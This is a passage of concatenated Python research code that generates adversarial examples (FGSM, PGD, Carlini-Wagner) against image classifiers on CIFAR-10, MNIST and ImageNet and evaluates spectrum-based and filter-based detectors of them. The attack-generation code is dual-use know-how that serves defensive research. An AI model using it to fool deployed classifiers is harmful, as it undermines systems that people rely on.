elif att_method == 'PGD_Linf_IDP':
attack = ProjectedGradientDescent(estimator=fmodel,eps=eps,norm=np.inf,batch_size=512,verbose=False)
elif att_method == 'CW_Linf_IDP':
attack = CarliniLInfMethod(classifier=fmodel,eps=eps,batch_size=512,verbose=False)
else:
raise Exception('Wrong Attack Mode: {} !!!'.format(att_method))
return attack, eps
def get_energy_label(self, model, imgs_in, labels_in, is_adv):
assert imgs_in.shape[-2]==imgs_in.shape[-1]
spectrum = self.s_analyzer(imgs_in)
labels_out = is_adv * np.ones(labels_in.shape)
return spectrum,labels_out.reshape((-1,1))
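# Usage sketch (comments only; mirrors the __main__ block below and assumes an
# ART-wrapped classifier `fmodel`, a float NCHW batch `images_batch`, and integer `labels_batch`):
#   labeler = img_spectrum_labeler('cifar-10')
#   attack, eps = labeler.select_attack(fmodel, attack_idx=1, eps_idx=2)
#   images_adv = attack.generate(x=images_batch, y=labels_batch)
#   spectra, flags = labeler.get_energy_label(model, images_adv, labels_batch, is_adv=1)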
if __name__=='__main__':
'''
settings
'''
# configure the labeler's run parameters
if len(sys.argv)!=4:
print('Manual Mode !!!')
model_type = 'allconv'
data = 'train'
device = 2
else:
print('Terminal Mode !!!')
model_type = sys.argv[1]
data = sys.argv[2]
device = int(sys.argv[3])
'''
Load CIFAR-10 images
'''
os.environ['CUDA_VISIBLE_DEVICES']=str(device)
dir_cifar = '../../../../../media/ubuntu204/F/Dataset/Dataset_tar/cifar-10-batches-py'
if 'test'==data:
images,labels = load_CIFAR_batch(os.path.join(dir_cifar,'test_batch'))
elif 'train'==data:
images,labels = load_CIFAR_train(dir_cifar)
else:
print('Wrong data mode !!!')
'''
Load the model
'''
dataset='cifar-10'
dir_model = '../models/cifar_vanilla_'+model_type+'.pth.tar'
if model_type == 'resnet50_imagenet':
model = models.resnet50(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset = 'imagenet'
elif model_type == 'vgg16_imagenet':
model = models.vgg16(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset = 'imagenet'
elif model_type == 'alexnet_imagenet':
model = models.alexnet(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset = 'imagenet'
elif model_type == 'resnet50':
model = resnet50().eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
elif model_type == 'vgg16':
model = vgg16_bn().eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
elif model_type == 'allconv':
model = AllConvNet(10).eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
else:
raise Exception('Wrong model name: {} !!!'.format(model_type))
model.eval()
if 'cifar-10'==dataset:
mean = np.array((0.5,0.5,0.5),dtype=np.float32)
std = np.array((0.5,0.5,0.5),dtype=np.float32)
nb_classes = 10
input_shape=(3,32,32)
rober_np= np.array([[0,1],[0,2],[0,3],
[1,1],[1,2],[1,3],
[8,1],[8,2],[8,3],
[9,1],[9,2],[9,3],
[4,1],[4,2],[4,3],
[5,1],[5,2],[5,3],
[12,1],[12,2],[12,3],
[13,1],[13,2],[13,3],
]) # (attack, eps) settings labeled as rober (robust)
elif 'imagenet'==dataset:
mean = np.array((0.485, 0.456, 0.406),dtype=np.float32)
std = np.array((0.229, 0.224, 0.225),dtype=np.float32)
nb_classes = 1000
input_shape=(3,224,224)
rober_np= np.array([[0,1],[0,2],[0,3],
[1,1],[1,2],[1,3],
[8,1],[8,2],[8,3],
[9,1],[9,2],[9,3],
[4,1],[4,2],[4,3],
[5,1],[5,2],[5,3],
[12,1],[12,2],[12,3],
[13,1],[13,2],[13,3],
]) # (attack, eps) settings labeled as rober (robust)
else:
raise Exception('Wrong dataset type: {} !!!'.format(dataset))
fmodel = PyTorchClassifier(model = model,nb_classes=nb_classes,clip_values=(0,1),
input_shape=input_shape,loss = nn.CrossEntropyLoss(),
preprocessing=(mean, std))
'''
Load the data
'''
labeler = img_spectrum_labeler(dataset)
# fft_transformer = img_transformer(8,0,6)
batch = 10
batch_num = int(len(labels)/batch)
spectrums_list = []
labels_list = []
start_time = time.time()
for i in tqdm(range(batch_num)):
'''
Attack and defense
'''
images_batch = images[batch*i:batch*(i+1),...].transpose(0,3,1,2)
labels_batch = labels[batch*i:batch*(i+1),...]
# label as adversarial samples
attack_name=np.random.randint(1)
attack_eps=np.random.randint(4)
attack,eps=labeler.select_attack(fmodel,attack_name, attack_eps)
images_adv = attack.generate(x=images_batch,y=labels_batch)
# label the sample as harmful or harmless according to the list
flag_rober=0
for m in range(rober_np.shape[0]):
if (attack_name==rober_np[m,0]) and (attack_eps==rober_np[m,1]):
flag_rober=1
break
spectrums_save,labels_save=labeler.get_energy_label(model, images_adv, labels_batch, flag_rober)
spectrums_list.append(spectrums_save)
labels_list.append(labels_save)
sub_dir='spectrum_label/'+model_type
saved_dir_path = '../saved_tests/img_attack/'+sub_dir
if not os.path.exists(saved_dir_path):
os.makedirs(saved_dir_path)
spectrums_np=np.vstack(spectrums_list)
labels_np=np.vstack(labels_list)
np.save(os.path.join(saved_dir_path,'spectrums_'+data+'.npy'), spectrums_np)
np.save(os.path.join(saved_dir_path,'labels_'+data+'.npy'), labels_np)
end_time=time.time()
print(("Time %f s")%(end_time-start_time))
```
#### File: adaptive-jpeg-compression/common_code/load_cifar_data.py
```python
import os
import numpy as np
from six.moves import cPickle as pickle
# from scipy.misc import imread
import platform
from PIL import Image
def load_pickle(f):
version = platform.python_version_tuple() # get the Python version number
if version[0] == '2':
return pickle.load(f) # pickle.load deserializes into Python data types
elif version[0] == '3':
return pickle.load(f, encoding='latin1')
raise ValueError("invalid python version: {}".format(version))
def load_CIFAR_batch(filename):
""" load single batch of cifar """
with open(filename, 'rb') as f:
datadict = load_pickle(f) # dict type
X = datadict['data'] # X: ndarray of pixel values
Y = datadict['labels'] # Y: list of class labels
X = X.reshape(10000, 3, 32, 32).transpose(0,2,3,1).astype(np.float32)/255.0
Y = np.array(Y)
return X, Y
def load_CIFAR_train(filename):
""" load single batch of cifar """
data_list = []
label_list = []
for i in range(1,6):
file = 'data_batch_{0}'.format(i)
f = os.path.join(filename,file)
data, label = load_CIFAR_batch(f)
data_list.append(data)
label_list.append(label)
X = np.concatenate(data_list)
Y = np.concatenate(label_list)
return X,Y
def load_imagenet_filenames(dataset_dir,features):
filename=dataset_dir+'.txt'
with open(filename, 'r') as f:
data_list=f.readlines()
label_list=[]
image_list=[]
for data in data_list:
sysnet,name=data.split('/')
label_list.append(features[sysnet])
image_list.append(data.replace('\n',''))
return image_list,label_list
def load_imagenet_batch(batch_idx,batch_size,data_dir,data_list,label_list):
filenames=data_list[batch_idx*batch_size:(batch_idx+1)*batch_size]
labels=np.array(label_list[batch_idx*batch_size:(batch_idx+1)*batch_size])
images=np.zeros([batch_size,224,224,3])
for file_idx,file in enumerate(filenames):
image = Image.open(os.path.join(data_dir,file)).convert('RGB').resize([224,224])
images[file_idx,...] = np.asarray(image)/255.0
images=images.transpose(0,3,1,2).astype(np.float32)
# images=images
return images,labels
```
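A short usage sketch for the loaders above; the CIFAR-10 directory is a placeholder path and the printed shapes follow from the reshaping done in `load_CIFAR_batch`.
```python
# Sketch: exercising the CIFAR-10 loaders above (the data directory is a placeholder).
import os
from load_cifar_data import load_CIFAR_batch, load_CIFAR_train

dir_cifar = '/path/to/cifar-10-batches-py'  # placeholder
X_test, Y_test = load_CIFAR_batch(os.path.join(dir_cifar, 'test_batch'))
X_train, Y_train = load_CIFAR_train(dir_cifar)
print(X_test.shape, Y_test.shape)    # (10000, 32, 32, 3) with values in [0, 1], (10000,)
print(X_train.shape, Y_train.shape)  # (50000, 32, 32, 3), (50000,)
```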
#### File: Test/CW/adaptive_CWL2_MNIST.py
```python
home_root = '~/' #change it to your own home path
nn_robust_attack_root = '/home/ll/nn_robust_attacks/' #change it to where you put the 'nn_robust_attacks' directory
import sys
sys.path.insert(0,home_root)
sys.path.insert(0,nn_robust_attack_root)
import os
import tensorflow as tf
import numpy as np
import time
import math
import random # needed by generate_data when sampling target classes in the targeted/Inception case
import matplotlib.pyplot as plt
from setup_mnist import MNIST, MNISTModel
from l2_attack import CarliniL2
from l2_adaptive_attack import CarliniL2Adaptive
# In[2]:
def generate_data(data, samples, targeted=False, start=9000, inception=False):
inputs = []
targets = []
for i in range(samples):
if targeted:
if inception:
seq = random.sample(range(1,1001), 10)
else:
seq = range(data.test_labels.shape[1])
for j in seq:
if (j == np.argmax(data.test_labels[start+i])) and (inception == False):
continue
inputs.append(data.test_data[start+i])
targets.append(np.eye(data.test_labels.shape[1])[j])
else:
inputs.append(data.test_data[start+i])
targets.append(data.test_labels[start+i])
inputs = np.array(inputs)
targets = np.array(targets)
return inputs, targets
def getProbabilities(img, model,sess):
imgTobePre = np.reshape(img, (1,28,28,1))
preList = np.squeeze(model.model.predict(imgTobePre))
return max(sess.run(tf.nn.softmax(preList)))
def mnistPredicate(img, model):
imgTobePre = np.reshape(img, (1,28,28,1))
preList = np.squeeze(model.model.predict(imgTobePre))
return preList.argmax()
# In[3]:
def normalization(image):
image[image < -0.5] = -0.5
image[image > 0.5] = 0.5
# In[ ]:
if __name__ == "__main__":
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
modelPath = '%smodels/mnist' % (nn_robust_attack_root)
data, model = MNIST(), MNISTModel(modelPath, sess)
blind_attack = CarliniL2(sess, model, batch_size=1, max_iterations=2000,confidence=0,binary_search_steps=5,initial_const=1.,learning_rate=1e-1,targeted=False)
adaptive_attack = CarliniL2Adaptive(sess, model, batch_size=1,confidence=0, max_iterations=2000,binary_search_steps=5,initial_const=1.,learning_rate=1e-1,targeted=False)
inputs, targets = generate_data(data, samples=1000, targeted=False, start=9000, inception=False)
total = 0
disturbed_failure_number1 = 0
test_number1 = 0
disturbed_failure_number2 = 0
test_number2 = 0
l2_distances = []
l2_distances2 = []
for i in range(len(targets)):
print(i)
inputIm = inputs[i:(i+1)]
target = targets[i:(i+1)]
oriCorrectLabel = data.test_labels[i+9000].argmax()
octStart = time.time()
oriPredicatedLabel = mnistPredicate(inputIm, model)
oriProb = getProbabilities(inputIm,model,sess)
octEnd = time.time()
if oriPredicatedLabel != oriCorrectLabel:
continue
total+=1
attackStart = time.time()
adv = blind_attack.attack(inputIm,target)
adv2 = adaptive_attack.attack(inputIm,target)
attackEnd = time.time()
normalization(adv)
normalization(adv2)
adv = np.reshape(adv, inputIm.shape)
adv2 = np.reshape(adv2,inputIm.shape)
actStart = time.time()
advPredicatedLabel1 = mnistPredicate(adv, model)
advProb1 = getProbabilities(adv,model,sess)
advPredicatedLabel2 = mnistPredicate(adv2, model)
advProb2 = getProbabilities(adv2,model,sess)
actEnd = time.time()
if advPredicatedLabel1 != oriCorrectLabel:
test_number1+=1
distortions1 = np.linalg.norm(adv-inputIm)
l2_distances.append(distortions1)
if advPredicatedLabel2 != oriCorrectLabel:
test_number2+=1
print('labels = ',oriCorrectLabel,' , ',advPredicatedLabel1,' , ',advPredicatedLabel2)
print('probs = ',oriProb,' , ',advProb1,' , ',advProb2)
distortions2 = np.linalg.norm(adv2-inputIm)
print('distortions = ',distortions1,' ; ',distortions2)
l2_distances2.append(distortions2)
print('succeeds = ',total,' ; ', test_number1,' ; ',test_number2)
print(sum(l2_distances)/test_number1)
print(sum(l2_distances2)/test_number2)
```
#### File: Test/FGSM/Test_FGSM_MNIST.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import keras
from keras import backend
import tensorflow as tf
from tensorflow.python.platform import flags
from cleverhans.utils_mnist import data_mnist
from cleverhans.utils_tf import model_train, model_eval, model_argmax
from cleverhans.attacks import FastGradientMethod
from cleverhans.utils import AccuracyReport
from cleverhans.utils_keras import cnn_model
from cleverhans.utils_keras import KerasModelWrapper
import time
import matplotlib.pyplot as plt
import math
FLAGS = flags.FLAGS
# In[2]:
def normalization(image_data):
image_data[image_data<0] = 0
image_data[image_data>1.0] = 1.0
def scalarQuantization(inputDigit, interval, left=True):
retDigit = inputDigit*255
retDigit//=interval
retDigit*=interval
if not left:
halfInterval = interval//2
retDigit+=(halfInterval)
retDigit/=255.0
return retDigit
def oneDEntropy(inputDigit):
expandDigit = np.array(inputDigit*255,dtype=np.int16)
f = np.zeros(256)
for i in range(28):
for j in range(28):
f[expandDigit[i][j]]+=1
f/=784.0
H = 0
for i in range(256):
if f[i] > 0:
H+=f[i]*math.log(f[i],2)
return -H
def crossMeanFilterOperations(inputDigit, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in xrange(start, end):
for col in xrange(start, end):
temp0 = inputDigit[row][col]
for i in range(1,start+1):
temp0+=inputDigit[row-i][col]
temp0+=inputDigit[row+i][col]
temp0+=inputDigit[row][col-i]
temp0+=inputDigit[row][col+i]
retDigit[row][col] = temp0/coefficient
return retDigit
def chooseCloserFilter(original_data,filter_data1,filter_data2):
result_data=np.zeros_like(original_data)
for j in range(28):
for k in range(28):
a=abs(filter_data1[j][k]-original_data[j][k])
b=abs(filter_data2[j][k]-original_data[j][k])
if(a<b):
result_data[j][k]=filter_data1[j][k]
else:
result_data[j][k]=filter_data2[j][k]
return result_data
def my_model_argmax(sess, x, predictions, samples):
feed_dict = {x: samples}
probabilities = sess.run(predictions, feed_dict)
return np.reshape(probabilities,10)
# if samples.shape[0] == 1:
# return np.argmax(probabilities)
# else:
# return np.argmax(probabilities, axis=1)
# In[3]:
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=6, batch_size=128,
learning_rate=0.001, train_dir="/tmp",
filename="mnist.ckpt", load_model=False,
testing=False):
keras.layers.core.K.set_learning_phase(0)
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
if not hasattr(backend, "tf"):
raise RuntimeError("This tutorial requires keras to be configured"
" to use the TensorFlow backend.")
if keras.backend.image_dim_ordering() != 'tf':
keras.backend.set_image_dim_ordering('tf')
print("INFO: '~/.keras/keras.json' sets 'image_dim_ordering' to "
"'th', temporarily setting to 'tf'")
# Create TF session and set as Keras backend session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
keras.backend.set_session(sess)
# Get MNIST test data
X_train, Y_train, X_test, Y_test = data_mnist(train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end)
# Use label smoothing
assert Y_train.shape[1] == 10
label_smooth = .1
Y_train = Y_train.clip(label_smooth / 9., 1. - label_smooth)
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
y = tf.placeholder(tf.float32, shape=(None, 10))
# Define TF model graph
model = cnn_model()
predictions = model(x)
print("Defined TensorFlow model graph.")
def evaluate():
# Evaluate the accuracy of the MNIST model on legitimate test examples
eval_params = {'batch_size': batch_size}
acc = model_eval(sess, x, y, predictions, X_test, Y_test, args=eval_params)
report.clean_train_clean_eval = acc
assert X_test.shape[0] == test_end - test_start, X_test.shape
print('Test accuracy on legitimate examples: %0.4f' % acc)
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate,
'train_dir': train_dir,
'filename': filename
}
# Train an MNIST model
ckpt = tf.train.get_checkpoint_state(train_dir)
ckpt_path = False if ckpt is None else ckpt.model_checkpoint_path
rng = np.random.RandomState([2017, 8, 30])
if load_model and ckpt_path:
saver = tf.train.Saver()
saver.restore(sess, ckpt_path)
print("Model loaded from: {}".format(ckpt_path))
else:
print("Model was not loaded, training from scratch.")
model_train(sess, x, y, predictions, X_train, Y_train, evaluate=evaluate,
args=train_params, save=True, rng=rng)
advGenTimeStart = time.time()
wrap = KerasModelWrapper(model)
advGenTimeStart = time.time()
fgsm = FastGradientMethod(wrap, sess=sess)
fgsm_params = {'eps': 0.3,
'clip_min': 0.,
'clip_max': 1.}
adv_x = fgsm.generate(x, **fgsm_params)
adv_x = sess.run(adv_x, feed_dict={x: X_test[5500:]})
advGenTimeEnd = time.time()
advGenTime = advGenTimeEnd-advGenTimeStart
for i in xrange(4500):
normalization(adv_x[i:(i+1)])
original_classified_wrong_number = 0
disturbed_failure_number = 0
test_number = 0
TTP = 0
TP = 0
FN = 0
FP = 0
for i in range(len(adv_x)):
current_class = int(np.argmax(Y_test[i+5500]))
oriPreTimeStart = time.time()
currentXLabel = model_argmax(sess,x,predictions,X_test[i+5500:(i+5501)])
currentXProbList = my_model_argmax(sess,x,predictions,X_test[i+5500:(i+5501)])
oriPreTimeEnd = time.time()
oriPreTime = oriPreTimeEnd-oriPreTimeStart
if currentXLabel != current_class:
original_classified_wrong_number+=1
continue
advPreTimeStart = time.time()
currentAdvXLabel = model_argmax(sess,x,predictions,adv_x[i:(i+1)])
currentAdvXProbList = my_model_argmax(sess,x,predictions,adv_x[i:(i+1)])
advPreTimeEnd = time.time()
advPreTime = advPreTimeEnd-advPreTimeStart
if currentAdvXLabel == currentXLabel:
disturbed_failure_number+=1
continue
# fig = plt.figure('test')
# picOne = fig.add_subplot(121)
# picOne.imshow(X_test[i+5500:(i+5501)].reshape((28,28)), cmap='gray')
# picTwo = fig.add_subplot(122)
# picTwo.imshow(adv_x[i:(i+1)].reshape((28,28)), cmap='gray')
# plt.show()
test_number+=1
print('probabilities = %.4f ; %.4f'%(currentXProbList[currentXLabel],currentAdvXProbList[currentAdvXLabel]))
tempX = np.reshape(X_test[i+5500:(i+5501)], (28,28))
test_x = np.array(tempX)
oriFilteredPreTimeStart = time.time()
currentX = np.reshape(X_test[i+5500:(i+5501)], (28,28))
imageEntropy = oneDEntropy(test_x)
if imageEntropy < 4:
current_x_res = scalarQuantization(currentX, 128)
elif imageEntropy < 5:
current_x_res = scalarQuantization(currentX, 64)
else:
current_x_ASQ = scalarQuantization(currentX, 43)
current_x_ASQ_AMF = crossMeanFilterOperations(current_x_ASQ,3,25,13)
current_x_res = chooseCloserFilter(currentX, current_x_ASQ, current_x_ASQ_AMF)
current_x_res = np.reshape(current_x_res, X_test[0:1].shape)
current_x_res_label = model_argmax(sess,x,predictions,current_x_res)
current_x_res_prob = my_model_argmax(sess,x,predictions,current_x_res)
tempX2 = np.reshape(adv_x[i:(i+1)], (28,28))
test_adv_x = np.array(tempX2)
currentAdvX = np.reshape(adv_x[i:(i+1)], (28,28))
imageEntropy2 = oneDEntropy(test_adv_x)
print('%d: %.2f------%.2f' % (i, imageEntropy,imageEntropy2))
if imageEntropy2 < 4:
current_adv_x_res = scalarQuantization(currentAdvX,128)
elif imageEntropy2 < 5:
current_adv_x_res = scalarQuantization(currentAdvX, 64)
else:
current_adv_x_ASQ = scalarQuantization(currentAdvX, 43)
current_adv_x_ASQ_AMF = crossMeanFilterOperations(current_adv_x_ASQ,3,25,13)
current_adv_x_res = chooseCloserFilter(currentAdvX, current_adv_x_ASQ, current_adv_x_ASQ_AMF)
current_adv_x_res = np.reshape(current_adv_x_res, X_test[0:1].shape)
current_adv_x_res_label = model_argmax(sess,x,predictions,current_adv_x_res)
current_adv_x_res_prob = my_model_argmax(sess,x,predictions,current_adv_x_res)
print('filtered Probs = %.4f ; %.4f'%(current_x_res_prob[current_x_res_label],current_adv_x_res_prob[current_adv_x_res_label]))
if current_adv_x_res_label != currentAdvXLabel:
TP+=1
if current_adv_x_res_label == current_class:
TTP+=1
else:
FN+=1
if current_x_res_label != currentXLabel:
FP+=1
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
Recall = TP/(TP+FN)
Precision = TP/(TP+FP)
tempStarStr = '********************************************************'
recallStr = 'Recall = %.4f' % (Recall)
precisionStr = 'Precision = %.4f' % (Precision)
print(tempStarStr)
print(recallStr)
print(precisionStr)
print(tempStarStr)
# In[4]:
def main(argv=None):
mnist_tutorial(nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
train_dir=FLAGS.train_dir,
filename=FLAGS.filename,
load_model=FLAGS.load_model)
if __name__ == '__main__':
flags.DEFINE_integer('nb_epochs', 6, 'Number of epochs to train model')
flags.DEFINE_integer('batch_size', 128, 'Size of training batches')
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate for training')
flags.DEFINE_string('train_dir', '/tmp', 'Directory where to save model.')
flags.DEFINE_string('filename', 'mnist.ckpt', 'Checkpoint filename.')
flags.DEFINE_boolean('load_model', True, 'Load saved model or train.')
tf.app.run()
```
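A small self-contained sketch of the detection rule used in `mnist_tutorial` above: the entropy of the 8-bit pixel histogram decides how coarse the scalar quantization is. The helper names are illustrative and the thresholds simply mirror the hard-coded values in the script.
```python
# Sketch: entropy-driven choice of the scalar-quantization interval (thresholds as above).
import numpy as np

def one_d_entropy(img):
    """Shannon entropy (bits) of the 8-bit pixel histogram of an image in [0, 1]."""
    hist = np.bincount((img * 255).astype(np.int16).ravel(), minlength=256)
    p = hist / hist.sum()
    p = p[p > 0]
    return float(-(p * np.log2(p)).sum())

def choose_interval(entropy):
    # Low-entropy (flat) images tolerate coarse quantization; detailed images get finer bins.
    if entropy < 4:
        return 128
    if entropy < 5:
        return 64
    return 43

img = np.random.rand(28, 28)  # stand-in for an MNIST test digit
H = one_d_entropy(img)
print('entropy = %.2f bits, interval = %d' % (H, choose_interval(H)))
```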
#### File: DeepDetector-master/Train/Train_FGSM_ImageNet.py
```python
import sys
caffe_root = '/home/ll/caffe'
sys.path.insert(0, caffe_root + '/python')
import matplotlib.mlab as mlab
import scipy.integrate as integrate
from PIL import Image
from scipy import fft
from scipy import misc
from skimage import transform
import shutil
import requests
import tempfile
import os
import math
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
get_ipython().run_line_magic('matplotlib', 'inline')
import time
import caffe
plt.rcParams['figure.figsize'] = (4, 4)
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
# In[2]:
def load_model():
BATCH_SIZE = 1
model_def = './bvlc_googlenet/deploy.prototxt'
net_weights = './bvlc_googlenet/bvlc_googlenet.caffemodel'
net = caffe.Net(model_def, net_weights, caffe.TEST)
shape = list(net.blobs['data'].data.shape)
shape[0] = BATCH_SIZE
net.blobs['data'].reshape(*shape)
net.blobs['prob'].reshape(BATCH_SIZE, )
net.reshape()
return net
def compute_gradient(image, intended_outcome):
predict(image, display_output=False)
probs = np.zeros_like(net.blobs['prob'].data)
probs[0][intended_outcome] = -1
gradient = net.backward(prob=probs)
return gradient['data'].copy()
def display(data):
plt.imshow(transformer.deprocess('data', data))
def get_label_name(num):
options = labels[num].split(',')
# remove the tag
options[0] = ' '.join(options[0].split(' ')[1:])
return ','.join(options[:2])
def predict(data, n_preds=6, display_output=False):
net.blobs['data'].data[...] = data
if display_output:
display(data)
prob = net.forward()['prob']
probs = prob[0]
prediction = probs.argmax()
top_k = probs.argsort()[::-1]
for pred in top_k[:n_preds]:
percent = round(probs[pred] * 100, 2)
# display it compactly if we're displaying more than the top prediction
pred_formatted = "%03d" % pred
if n_preds == 1:
format_string = "label: {cls} ({label})\ncertainty: {certainty}%"
else:
format_string = "label: {cls} ({label}), certainty: {certainty}%"
if display_output:
print format_string.format(
cls=pred_formatted, label=get_label_name(pred), certainty=percent)
return prob
def add_matrix(image_data,offset,ratio):
result_data=np.zeros_like(image_data)
for x in range(1):
for y in range(3):
for z in range(224):
for v in range(224):
result_data[y][z][v]=image_data[y][z][v]+ratio*offset[x][y][z][v]
if(result_data[y][z][v]<0):
result_data[y][z][v]=0
if(result_data[y][z][v]>255):
result_data[y][z][v]=255
return result_data
# In[3]:
def normalization(image_data):
image_data[image_data<0] = 0
image_data[image_data>255] = 255.0
def boxMeanFilterOperations(inputDigit, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in xrange(start, end):
for col in xrange(start, end):
retDigit[0][row][col] = sum(sum(inputDigit[0,row-start:row+start+1,col-start:col+start+1]))/coefficient
retDigit[1][row][col] = sum(sum(inputDigit[1,row-start:row+start+1,col-start:col+start+1]))/coefficient
retDigit[2][row][col] = sum(sum(inputDigit[2,row-start:row+start+1,col-start:col+start+1]))/coefficient
return retDigit
def diamondMeanFilterOperations(inputDigit, kernel, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in xrange(start, end):
for col in xrange(start, end):
retDigit[0][row][col] = sum(sum(inputDigit[0,row-start:row+start+1, col-start:col+start+1]*kernel))/coefficient
retDigit[1][row][col] = sum(sum(inputDigit[1,row-start:row+start+1, col-start:col+start+1]*kernel))/coefficient
retDigit[2][row][col] = sum(sum(inputDigit[2,row-start:row+start+1, col-start:col+start+1]*kernel))/coefficient
return retDigit
def crossMeanFilterOperations(inputDigit, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in xrange(start, end):
for col in xrange(start, end):
temp0 = inputDigit[0][row][col]
temp1 = inputDigit[1][row][col]
temp2 = inputDigit[2][row][col]
for i in range(1,start+1):
temp0+=inputDigit[0][row-i][col]
temp0+=inputDigit[0][row+i][col]
temp0+=inputDigit[0][row][col-i]
temp0+=inputDigit[0][row][col+i]
temp1+=inputDigit[1][row-i][col]
temp1+=inputDigit[1][row+i][col]
temp1+=inputDigit[1][row][col-i]
temp1+=inputDigit[1][row][col+i]
temp2+=inputDigit[2][row-i][col]
temp2+=inputDigit[2][row+i][col]
temp2+=inputDigit[2][row][col-i]
temp2+=inputDigit[2][row][col+i]
retDigit[0][row][col] = temp0/coefficient
retDigit[1][row][col] = temp1/coefficient
retDigit[2][row][col] = temp2/coefficient
return retDigit
def scalarQuantization(inputDigit, interval, left=True):
retDigit = np.array(inputDigit,dtype=np.float32)
retDigit//=interval
retDigit*=interval
if not left:
halfInterval = interval//2
retDigit+=(halfInterval)
return retDigit
# In[4]:
def trainBoxMeanFilters(rootDir,true_class):
print(rootDir)
for kernelSize in xrange(3,10,2):
startTime = time.time()
print('box filter, size = ', kernelSize)
original_classified_wrong_number = 0
disturbed_failure_number = 0
Total=TTP=TP=FP=FN=0
start = (kernelSize-1)//2
end = 224-start
coefficient = kernelSize**2
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for f in files:
original_data=transformer.preprocess('data', caffe.io.load_image(os.path.join(root, f)))
net.blobs['data'].data[...] = original_data
ori_out = net.forward()
pred_class = ori_out['prob'][0].argmax()
if pred_class != true_class:
original_classified_wrong_number+=1
continue
grad = compute_gradient(original_data, pred_class)
delta = np.sign(grad)
adversarial_data=add_matrix(original_data,delta,1.0)
normalization(adversarial_data)
net.blobs['data'].data[...] = adversarial_data
adv_out = net.forward()
adv_class = adv_out['prob'][0].argmax()
if adv_class == true_class:
disturbed_failure_number+=1
continue
Total+=1
ori_processed = boxMeanFilterOperations(original_data, start, end, coefficient)
net.blobs['data'].data[...] = ori_processed
ori_filtered_out = net.forward()
ori_filtered_class = ori_filtered_out['prob'][0].argmax()
adv_processed = boxMeanFilterOperations(adversarial_data, start, end, coefficient)
net.blobs['data'].data[...] = adv_processed
adv_filtered_out = net.forward()
adv_filtered_class = adv_filtered_out['prob'][0].argmax()
if(ori_filtered_class!=true_class):
FP+=1
if (adv_filtered_class!=adv_class):
TP+=1
if (adv_filtered_class == true_class):
TTP+=1
else:
FN+=1
print("Overall results: ")
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (Total,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall=TP*1.0/(TP+FN)
Precision=TP*1.0/(TP+FP)
print('********************************')
print ("Recall: ",Recall)
print ("Precision: ",Precision)
print('********************************')
# In[5]:
def trainDiamondMeanFilters(rootDir,true_class,diamonds):
print(rootDir)
coefficient = [5,13, 25, 41]
kernelIndex = -1
for kernelSize in xrange(3,10,2):
startTime = time.time()
print('diamond filter, size = ', kernelSize)
original_classified_wrong_number = 0
disturbed_failure_number = 0
Total=TTP=TP=FP=FN=0
start = (kernelSize-1)//2
end = 224-start
kernelIndex+=1
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for f in files:
original_data=transformer.preprocess('data', caffe.io.load_image(os.path.join(root, f)))
net.blobs['data'].data[...] = original_data
ori_out = net.forward()
pred_class = ori_out['prob'][0].argmax()
if pred_class != true_class:
original_classified_wrong_number+=1
continue
grad = compute_gradient(original_data, pred_class)
delta = np.sign(grad)
adversarial_data=add_matrix(original_data,delta,1.0)
normalization(adversarial_data)
net.blobs['data'].data[...] = adversarial_data
adv_out = net.forward()
adv_class = adv_out['prob'][0].argmax()
if adv_class == true_class:
disturbed_failure_number+=1
continue
Total+=1
ori_processed = diamondMeanFilterOperations(original_data, diamonds[kernelIndex], start, end, coefficient[kernelIndex])
net.blobs['data'].data[...] = ori_processed
ori_filtered_out = net.forward()
ori_filtered_class = ori_filtered_out['prob'][0].argmax()
adv_processed = diamondMeanFilterOperations(adversarial_data, diamonds[kernelIndex], start, end, coefficient[kernelIndex])
net.blobs['data'].data[...] = adv_processed
adv_filtered_out = net.forward()
adv_filtered_class = adv_filtered_out['prob'][0].argmax()
if(ori_filtered_class!=true_class):#FP
FP+=1
if (adv_filtered_class!=adv_class):
TP+=1
if (adv_filtered_class == true_class):
TTP+=1
else:
FN+=1
print("Overall results: ")
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (Total,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
